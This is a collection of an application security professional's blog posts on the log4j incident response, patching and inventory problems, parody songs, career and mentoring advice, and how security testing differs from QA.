Why can’t I get over log4j?

Image of Tanya Janca

I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved (one company estimated 100 weeks of work, completed over the course of 8 days of time) in the response was spectacular, and the damage caused is still unknown at this point. We will likely never know the true extend of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect story telling experience you are used to here, bear with me, please.

Short rehash: log4j is a popular java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar, and if vulnerable, the user would have remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased my multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool ) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard several vendors have their customers demand “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore it’s not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had WAF, RASP, or CNDs were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few company’s bacon and reduced the risk greatly.

I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that it is a vulnerability in itself. Log4j proved this, as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly, this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Parody Songs

Image of Tanya half way through singing this song

For those who are not aware, I used to be a professional musician. I went both under my name (Tanya Janca, folk singer) and was in several different musical groups including Couchwrecked, who wrote the song Hottawa.

I just released another parody video and thought I would share it.

“Open Source Ain’t So Good”

Set to the music “You Know I’m No Good” by Amy Winehouse

“Open Source Ain’t So Good”

Reviewing my dependencies, and it hurt,

My rolled up sleeves, SheHacksPurple shirt

You say “what did I add to my app today?”

And sniffed out insecure log4j

‘Cause you’re my sec champ, my guy

Hand me your code and fly

By the time I scanned your dependencies

My tool lit up like a Christmas tree

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

Open source is free, like a puppy

You Gotta check for insecurities

Just because the code is there for all to see

Don’t mean that it’s been tested thoroughly

Rush to run my SCA tool

It looks at me and 

says I’m such a fool

This package ain’t supported no more

I cried for us on the kitchen floor

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

Sweet refactor, Dependencies upgrade

The app is like it was again

I’m testing it all, while you sit and wait

Us PenTesters, we never hesitate

Then I notice the results and it burns

My stomach drop and my guts churn

You shrug and it’s the worst

Who truly stuck the knife in first

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

I cheated my app

Like I knew I would

I told you It was trouble

Yeah, Open Source ain’t so good

And here is a previous parody I released, last month.

.

Just Release It Anyway

Sung to Backstreet Boy’s “I want it that way”

“Just Release It Anyway”

Lyrics

Yeah

You are, setting fires

In my, applications

Believe when I say

I don’t want it that way

Your app, is falling apart

Security isn’t in your heart

When you say

Release it anyway

Tell me why You didn’t fix the bugs I found

Tell me why You Ignored the PenTest result

Tell me why I never wanna hear you say

Release it anyway

Am I your advisor?

Your one security hire

Yes, I know it’s too late

‘Cause you released it anyway

Tell me why You didn’t fix the bugs I found

Tell me why You Ignored the PenTest report

Tell me why I never wanna hear you say

Release it anyway

Our security program has fallen apart From the way we know it should be, yeah

No matter the software I want you to know It’s safety matters to meeeeeeeeeee

You are, setting fires

In my, applications

Believe when I say I don’t want it that way

Ain’t nothin’ but a heartache

Ain’t nothin’ but a mistake (don’t wanna hear you say)

I never wanna hear you say (oh, yeah)

Just release it anyway

Tell me why

Ain’t nothin’ but a heartache

Tell me why

Ain’t nothing but a mistake

Tell me why I never want to hear you say (never wanna hear you say)

Release it anyway

Tell me why

Ain’t nothin’ but a heartache

Ain’t nothin’ but a mistake

Tell me why I never want to hear you say (don’t want to hear you say)

Just Release it anyway

‘Cause I don’t want it that way

The Difference Between Applications and Infrastructure

Christian Wiediger on Unsplash

Recently someone asked me what the difference was between Applications and Infrastructure. He asked why a Linux operating system wasn’t “software” and I said it was but it’s a perfect copy… I tend to speak about ‘custom software’. We ended up talking for a very long time about it, and I thought a blog post was in order.

Photo by Christian Wiediger on Unsplash

Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application, even serverless runs (briefly) on a container. Operating systems are also all standardized, and not unique in nature. For instance, if I’m running SQL server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speak to hardware. 

Applications are software that speak to operating systems, databases, APIs and anything else you can think of. There are custom applications (what I’m almost always talking about, software developed for a specific business need or as a product to sell), COTS (configurable off the shelf, like sharepoint or confluence, administered by a person or team, installed locally on a server) and regular old software that you install or access via a web browser that you use as-is (no administration required/simpler). More newly there is SaaS, software as a service, which is basically a great big COTS product, hosted by someone else (no need for you to patch or otherwise take care of it, you pick your settings and use it). 

Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing and sometimes downtime is required. This is why so many people say ‘patching is hard’, it is difficult to plan for testing, downtime and to ensure everything will go smoothly. 

Software, on the other hand, includes many different components that will be provided prepackaged (such as a new version of a library or a framework) but when you update them sometimes other libraries or framework parts break and/or the custom code that your team wrote can break as well. Meaning you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I’ve heard developers refer to this as “dependency hell”

If you have just released something brand new, it’s super easy to keep it up to date. Tiny changes present less risk (which is why people love devops over waterfall), making it easier to maintain. But because it’s sparkling and new… Usually management says “hey, please build this new feature, and update that library later”. This is how technical debt accrues. It’s not operational staff or software developers saying ”forget that, I don’t care about this“, it’s almost always conflicting priorities. 

I hope this helps clarify the difference.

Discoveries as a Result of the Log4j Debacle

Me, pre-log4j
Tanya making a silly face.
Happier times, before I knew anything about log4j.

Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4J java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

​Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I already posted in my newsletter, on this blog and my youtube channel , I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including Web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams who I admire. If they find it hard, how can smaller companies with fewer resources get it done? When responding to this incident this problem has never been more obvious.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

​Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of; GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • SVN, ClearCase, SourceSafe, subversion and other repos I thought no one was using anymore… That are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code is kept, meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.

Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know you’re assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most-talked about throughout this situation. The question posed is most-often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS), that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access or has access but the incorrect set of rights? There are dozens are reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?

Lack of Incident Response/Investigation Training

Many people I spoke to who are part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, having no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had near as much training as I would like, with most of what I have learned being from on the job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery network) like CloudFlare, behind a WAF (Web Application Firewall) or a RASP (Run-Time Application Security Protection).

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call “Ancient Dependencies”; dependencies so old that the application would requiring re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4J is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.

I want to talk about Log4j

What my face looked like when I figured out how scary this log4j thing is.

Lots of people are talking about how Log4J affects servers, but if you subscribe to my newsletter or read my blog, you probably want to know about your apps. Let’s talk about what the problem is, how to figure out if you have it, then what to do about it.

Problem: this java logging dependency has a vulnerability in it that allows an attacker to take over your web server and run commands from it. They can run this attack before a login screen (unauthenticated). This is the “most scary possible” from a security viewpoint.

What my face looked like when I figured out how scary this log4j thing is.
My face when I understood how scary log4j is.

Do you have this problem? You can search for it in a bunch of ways, but I suggest just going to your code repo, searching for “*log4J*”. If you find nothing, ALSO search using any sort of dependency tool. This could be dependencyGraph in GitHub, Snyk, OWASP Dependency-Check, White source, etc. These are also often called “Software Composition Analysis” or SCA for short.

Versions 2.x (every single one except 2.17) are vulnerable. Note: 2.15 and 2.16 are also vulnerable.

Versions 1.x are only vulnerable if you call the JMSAppender functionality. You can look in your code for “JMSAppender” to see if you are calling it. If you are, you are vulnerable. If not, you’re good.

If you’re going to rule it out, make absolutely sure. If you don’t have it, go back to your week and chill. If you do, let’s get into that.

NOTE: Email your security team (appsec team) and let them know you don’t have it. They will be SO HAPPY.

Now onto if you have it.

Okay, so you have Log4J and you think your week is ruined, but maybe it’s not. For each instance you find make a list, to document, and to give to security later. Verify if the code has actually been deployed somewhere or not. As I did some IR this weekend, most instances I found were undeployed.

If the code has not been deployed anywhere, mark it as “do not deploy” and move on. Anything that HAS been deployed: where? WHERE is it deployed/where does it live? Behind a WAF or CDN? If so, add the rules to block this attack. CloudFlare & CloudFront both do, turn it on!

If you have your own RASP or WAF, and there are no rules available yet from your vendor (ask them if you don’t see it, tell them you want one if not). So if not available from the vendor, make your own “virtual patch”. Work with InfoSec to write regex that blocks the attack or fish some off of the internet (you are not the only one with this problem).

To be clear, if you make a virtual patch, this is a temporary measure, and you need to 1) monitor it to make sure it’s working, plus 2) upgrade the versions of Log4J as soon as you can. Don’t forget please. 😀

Worst case scenario: You have log4J, nothing to help you block it, and it’s a vulnerable version.

It’s go time.

Option 1: “accept the risk” and do nothing to block it. You will still monitor the situation, but that is all. You will instead spend your efforts on releasing the upgraded version of your software as soon as humanly possible. For some organizations, this is the only option. Don’t feel bad, use that energy of the update instead. Ensure you test thoroughly; you don’t want to release patches like our industry saw during Meltdown/Spector that broke the patched systems worse than the vulnerability would have.

Option 2: Shut off the vulnerable systems. Immediately. If your business can have a few systems down until you figure out how to do something better, this *might* present less risk. There are currently many systems all over the internet being turned off, in the short term. There is no shame in doing this if it’s your best option. I’d rather have egg on my face than an exploited server.

Option 3: Go through your code and remove this dependency from your project, then comment out the code that calls it. When you are ready to apply the upgrade/patch, you will add it and turn it back on. Stop logging, just for now. This is the only situation where I would ever recommend removing logging. Test it thoroughly before deploying and make sure you don’t have any sort of “backup logging” that could interfere or spoil your efforts.


No matter what you decide: Tell the InfoSec team. Tell your management. Do not make these decisions solo.


I made a video about it as well. This topic is important to me, and it should be to you too.

Log4J Affecting Civilians

This vulnerability will affect many systems, including the ones you use at home. Here are some tips to protect your personal devices and home network (tell your friends).

  • Apply updates. Especially this week and next week. If you’re computer, phone or any piece of software wants an update, say yes. Updates in general are great, they often contain security fixes, as well as new features.
  • At some point this week make time to call your internet provider and ask if your router or modem has any updates for log4j. A lot of *devices* are going to be vulnerable, and most of us forget about our modems.
  • If you have “smart” devices at home, check for updates on them too!

More tips!

While we’re at it, here are a few tips for securing your digital self (again, tell your friends!):

  • Turn on Multi-Factor Authentication (MFA) or two-factor authentication (2FA), on all your online accounts that are important to you. Your banking accounts, government services, shopping accounts that have a credit card saved, etc.
  • Get a password manager. Then change and save your passwords into it, one by one, as you visit all your favourite sites. Let it auto-generate unique passwords for you.
  • Think twice before you click on a link in an email if you were not expecting to receive that email. Verify who it’s from, that it’s a legitimate website, and that the link starts with a domain that you recognize. If you’re not sure, copy the link into google.com (not the address bar, go to the search engine website) then add “phishing” to your search and see what it says.
  • Never give personal information, such as pictures of your ID, your social insurance number, your home address, date of birth, etc. to anyone on the internet.

My Career Story

Me, smiling

I started coding at 17 years old, and it was love at first sight.

I got great marks in all of my classes in high school, but loved computer science because in every class, I could “make something out of nothing.” Computer science runs deep in my family as almost all of my aunts and uncles are computer scientists, and my cousins are engineers, scientists and programmers. When I announced that I wanted to go to college for computer science my family responded with “what else would you take?” It wasn’t until years after working in tech that I realized that this is not an experience that most young women share.

I landed my first job in tech at age 18, and haven’t stopped since, despite several career setbacks, harassment and toxic work environments. I realize this might not seem very encouraging, but I have to tell you; things in tech have really improved. I’ve had the fortune of work experience in a variety of different situations both in computer science and in my other passion, music. Both careers taught me the value of collaborating with others, confronting differences, and taking constructive criticism well. It’s also given me the benefit of becoming more resilient when it comes to unpleasant situations or less-than-constructive comments made in the workplace.

For many years, I was a programmer by day and a musician at night. My successful music career allowed me to play in countless venues and bars around town, and it taught me many lessons that have since turned out to be very helpful in tech, such as how to handle hecklers, how to capture the attention of a drunk and belligerent crowd, and what the best way to throw someone off a stage is. As you can imagine, there were challenges to being a young 20-something woman in a hardcore punk band.

Later in my career I met an ethical hacker who was also in a band and we became friends. He spent the next 1.5 years convincing me to join him as his apprentice and learn how to hack. I became fascinated with the security of software, I wanted to know everything. I joined my local OWASP chapter and almost immediately became a chapter leader, which helped me greatly since I had the chance to invite experts on topics that I was interested in to come speak for us. I also met my next 3 professional mentors though OWASP, who taught me even more. OWASP is an incredibly supportive and amazing community, I strongly recommend that everyone joins their local chapter.

OWASP Montreal, I drove there with my mom to speak at lunch time. I missed a day of work for it.

At this point in my career I felt like I had a thirst for knowledge that could not be quenched. Although I managed to switch over from software development to a full time security job, I was frustrated that there was no budget for me to go on the types of advanced training that I was interested in. Then one of my professional mentors convinced me to speak at a conference, and they let me in FOR FREE.

For the next 2 years, I spoke at meetups and local events, taught myself as much as I could, and worked in application security helping developers make more secure apps. I loved it, but I kept striving for more. I wanted to do more modern types of application security, and I realized that the organizations I worked for were not very modern, and resistant to change. I found that my drive and ambition was difficult for certain managers, and it became a point of friction for me in the workplace.

Then I broke through from meetups into speaking at conferences. I honestly couldn’t believe it when I received the email saying that I had been accepted to speak at AppSec EU, the international OWASP conference. I discovered that all of my musical stage performance skills transferred over and with all of my practice at meetups that I had become good at public speaking. After AppSec EU, I had invitations to speak all over the world. As conferences started sending me plane tickets, I took time off work and went off to learn for free. I realized that a career shift was necessary. I knew that I had something to offer to the right employer, but I wasn’t quite sure what that would be… Then Microsoft reached out to me.

A Microsoft representative said that he had heard about me, and wanted to interview me for a “Developer Advocate” position. I had no idea at that point that “developer relations” was a job, and when he described what the job would be I said “I already do that, for free.” It took him about 20 minutes to convince me that he was not kidding, this was a real job, and he was actually from Microsoft. Before I knew it, I was traveling the planet, learning about cloud security, working with absolutely brilliant people and so much more. All the while I was *getting paid* to do it! Talk about a dream!

During my many years traveling and talking to the community, I learned a lot about my industry, both good and bad. I learned that software developers had a lot of aches and pains in regards to security that I had also felt when I was a developer, and especially during my work in incident response and AppSec. My goal in being a developer and cloud advocate was to help push the industry forward, and to help people create more secure software, everywhere. During this time I founded the #CyberMentoringMonday online initiative and the WoSEC (Women of Security) organization, released countless articles, videos and podcasts, and spoke regularly at security events. Although I definitely felt I was helping many people in my industry, I felt like I could do even more. I also felt the constant travel was extremely exciting, but also exhausting and perhaps not the most efficient way to help the most people. I wanted to figure out how to make a bigger difference, and ’scale’ myself in a more effective manner.

With that in mind, I started to devise a plan; focus my efforts in a more concise way in order to deliver more impact. Do fewer things, but do those things in a very big way. I decided to choose two big goals; to write a book and start my own company. And I decided I would just go for it, even if it was scary.

I realized at this point that I was going to have to leave Microsoft to pursue my new career goals. I decided to start my own online training academy, We Hack Purple. We have a podcast, community and courses, it’s a dream come true!

I am also in the process of writing my first book! It’s an intro to AppSec, “Alice and Bob Learn Application Security”, and I’m excited to share it with the community at large when it’s ready. Even though I am at the very beginning of both of these adventures, you better believe I plan to knock them out of the park! ** Alice and Bob Learn AppSec is now available worldwide!

If I can offer advice to you it is this: if you want it, go get it. Don’t let anyone tell you that you can’t reach greatness; you can, you just need to be prepared to work like you’ve never worked before. The Information Security industry needs all the help it can get, and we definitely need you. Yes you, the person reading this right now. Please join us, and help us make the world a better and more secure place.

I have a mailing list, please subscribe, it’s free!

#CyberMentoringMonday

WoSEC Ottawa

Some people have been asking me online how to be a good mentor. Here are some thoughts for all of you. 😀

Some mentees don’t listen, and are not willing to put in the work. Some of them will astound you and excel beyond your wildest dreams. The key is finding a good match for you, and for them.

It’s your job as a mentor to try to help your mentee any way you can. That can be through advice, loaning them a book, sharing resources, introducing them to people that can help them, referring them for a job (if appropriate) or other opportunities.

WoSEC Ottawa— Women of Security

Example: I wrote an essay to explain to a conference why one of my mentees deserved a diversity grant. She has worked SO HARD to teach herself and change careers. She won the grant because of her hard work, AND my essay. It took me 30 minutes, and she benefited.

Example 2: I brainstormed talk ideas with a mentee, then she built an amazing proof of concept. I asked a conference that I was keynoting to book her, even though she’d never spoken before. She was AMAZING! Out of this world! I knew she would be good, but she was 10 times better than I would have dared to hope for.

Example 3: When I’m invited to speak somewhere but cannot make it, I ask if they would like me to recommend someone else. I have a list of people who are not well-known, but who are amazing. I always recommend one of them to take my place. I advocate for them.

Example 4: I asked a friend to let one of my mentees into his very expensive training for free, and he said yes. I let her stay in my hotel room with me so she could afford the trip. It cost me one favour and sharing my room to give her a huge leg up for her career.

I use the power and privileges of my current role to help others, and you can too. You may not even realize how much power you have until you start helping someone.

Sometimes it’s recommending or loaning someone the right book. Sometimes it’s about letting them have a place in your training, workshop, talk, or conference for free. Sometimes it’s helping them when they are stuck at work on a technical problem and you give them the answer. Maybe you will introduce them to the person who will hire them some day. It’s about helping however you can.

The key with mentoring is that they can trust you, and that you have their best interests at heart. It’s not about being perfect or knowing everything. It’s about your motivations.

Good luck folks!

#CyberMentoringMonday

Security bugs are fundamentally different than quality bugs

This topic has come up a few times this year in question period: arguments that quality bugs and security bugs ‘have equal value’, that security testing and QA are ‘the same thing’, that security testing should ‘just be performed by QA’ and that ‘there’s no specific skillset’ required to do security testing versus QA. This post will explain why I fundamentally disagree with all of those statements.

First some definitions.

A software bug is an error, flaw, failure or fault in a computer program or system that causes it to produce an incorrect or unexpected result, or to behave in unintended ways.

A security bug is specifically a bug that causes a vulnerability. A vulnerability is a weakness which can be exploited by a Threat Actor, such as an attacker, to perform unauthorized actions within a computer system.

QA looks for software bugs (any kind); security testers look for vulnerabilities. This is the main difference, their goals.

Just as all women are human beings, but not all human beings are women; while all security bugs are defects, not all defects are security bugs.

Now let’s dissect each of the claims above.

1. Quality bugs and security bugs ‘have equal value’.

If a security bug can lead to a low risk vulnerability, it does not have ‘the same value’ as a non-security-related bug that is making the system crash over and over. The same as if a security bug is creating a situation of a potential data breach, or worse, it’s not equivalent to the fonts not matching from page to page. I am of the opinion that security bugs are more likely to be able to cause catastrophic business harm than a regular bug, due to the fact that if your system has fallen under the control of a malicious actor, creativity is the only limit. Malicious actors never cease to amaze me with the damage they can do.

Someone is wearing camouflage. — #MSIgniteTheTour, Toronto, 2019

2. Security testing and QA are ‘the same thing’

The goals of security testing and quality assurance testing are different, which I feel makes them obviously different (if they were the same, why would they not be called the same thing?), however I want to get deeper into this idea.

Security is a part of quality.

I often say, “Security is a part of quality.”, because I believe this to be true. You cannot have a high-quality product that is insecure; it is an oxymoron. If an application is fast, beautiful and does everything the client asked for, but someone breaks into the first day that it is released, I don’t think you will find anyone willing to call it a high-quality application.

There are many different types of testing;

· Unit Testing — small automate-able tests to verify small units of code (functions/subroutines) to verify it does the one thing it is supposed to do.

· Integration Testing — test between different components to ensure they work well together. Larger than unit tests, but less intense than end to end tests.

· End-To-End Testing — ensuring the flow of your application from start to finish is as expected

· User Acceptance Testing (UAT) — manual and/or automated testing of client requirements (often used interchangeably with ‘QA’),

· User Experience Testing (UX) — verifying that the application or product is easy to use and understand from a user perspective)

· Regression Testing — verifying that new changes have not broken anything that was already tested, a ‘retesting’ of all previously released functionality

· Stress/Performance/Load Testing — verifying your application can handle large amounts of usage/traffic while continuing to perform well, generally performed using software tools (although each of these three have slight differences, they are all generally lumped in together)

· Security Testing — a mix of manual and automated testing, using one or more tools, with the aim to find vulnerabilities within applications.

There are more types of testing, but I think you get the point.

Some or all of these types of testing can be used to verify that a product is of high quality, and security is just one part. Therefor, security testing and QA are not ‘the same thing.’

3. Security testing ‘should be performed by QA’

For each one of the types of testing listed above a different skillset is required. All of them require patience, attention to detail, basic technical skills, and the ability to document what you have found in a way that the software developers will understand and be able to fix the issue(s). That is where the similarities end. Each one of these types of testing requires different experience, knowledge, and tools, often meaning you need to hire different resources to perform the different tasks. Also, we can’t concentrate on everything at once and still do a great job at each one of them.

Although theoretically you could find one person who is both skilled and experienced in all of these areas, it is rare, and that person would likely be costly to employ as a full-time resource. This is one reason that people hired for general software testing are not often also tasked with security testing. Another reason is that people who have the experience and skills in order to perform thorough and complete security testing are currently a rarity, there is a skill shortage, while as an industry we are lucky to have quite a number of skilled QA professionals, making them easier to hire and staff. Lastly, the amount of time, training and experience that it takes to become a security tester, versus a general software tester, is more difficult to acquire.

Training on how to perform security testing is extremely expensive and difficult to find, it generally takes longer to learn it as a skill than other types of testing, and there are fewer opportunities to get into that industry, when compared to QA. Thus it is more difficult to become a security tester, when compared to general testing. Scarce resources, high demand, expensive training means it costs significantly more to hire security testers than it does to hire general software testers.

All of these facts lead up to the reality that it is cost-prohibitive to have staff your QA team with professionals who are skilled and experienced in both QA and security testing. This also means that you are creating a single point of failure for testing in your organization, which will not save you money in the long run.

#MSIgniteTheTour, Toronto, 2019

Another point on this topic; those who work in the security industry are likely to have a preference for their area of focus, security, and may be unwilling to perform other types of work outside their area of concentration (people who specialize generally want to work within their area of specialization, whenever possible, and security testing is a specialization).

4. ‘There’s no specific skillset’ required to do security testing versus QA.

First of all, I feel this statement is insulting to QA testers, as though they do not have a specific skillset that makes them good at what they do. I don’t believe that to be true. I suspect that when people make this argument that it is out of frustration with our industry, because I honestly cannot fathom someone thinking that security testing does not require specific experience, training or skills; otherwise there would be no skills shortage and it would not be a high-paying job. Security testing is a specialization within the field of testing, just as there are specializations within any field, and by definition it requires more knowledge and training to form the skillset in order to do the job.

I do not intend to downplay the value of QA testing, only to explain that quality assurance is different from ensuring that a product is secure. I should also say that I feel that hacking is sometimes glorified in television, the media and our industry as a whole, in a way that isn’t logical to me. Security testing is very important, but I do not believe that hackers are superior to other professionals who work in IT. In fact, I choose to focus my career on AppSec, DevSecOps and other types of defence, because I truly believe that it is more important that we write secure code than we ‘hack all the things’. Security is so much more than just security testing (ethical hacking), it is secure design, secure coding, threat modelling, etc.

I feel comments like this (#4) are not based on facts, but feelings, and it’s difficult to debate with someone when that is the case.

It is okay if we disagree on this topic. Debate is good and healthy, and I would love to hear your feelings, thoughts and ideas in the comments.

At this point I’d like to remind you all that security is everybody’s job. Not only is it everyone’s responsibility to do their job in the most secure way they know how, but having many different people look at something with security in mind can help us find new and different problems that may have otherwise been missed.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Security Headers for ASP.Net and .Net CORE

Website report showing we received an A

For those who do not follow myself or Franziska Bühler, we have an open source project together called OWASP DevSlop in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we’ve learned on our YouTube Channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska’s post OWASP DevSlop’s journey to TLS and Security Headers. If you like this one, read hers too. 🙂

Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episode 22.1 and 2.2. Unfortunately we found out that .Net Core apps don’t have a web.config, so the next time we published it wiped out the beautiful headers we had added. Although that is not good news, it was another chance to learn, and it gave me great excuse to finally write my Security Headers blog post that I have been promising. Here we go!

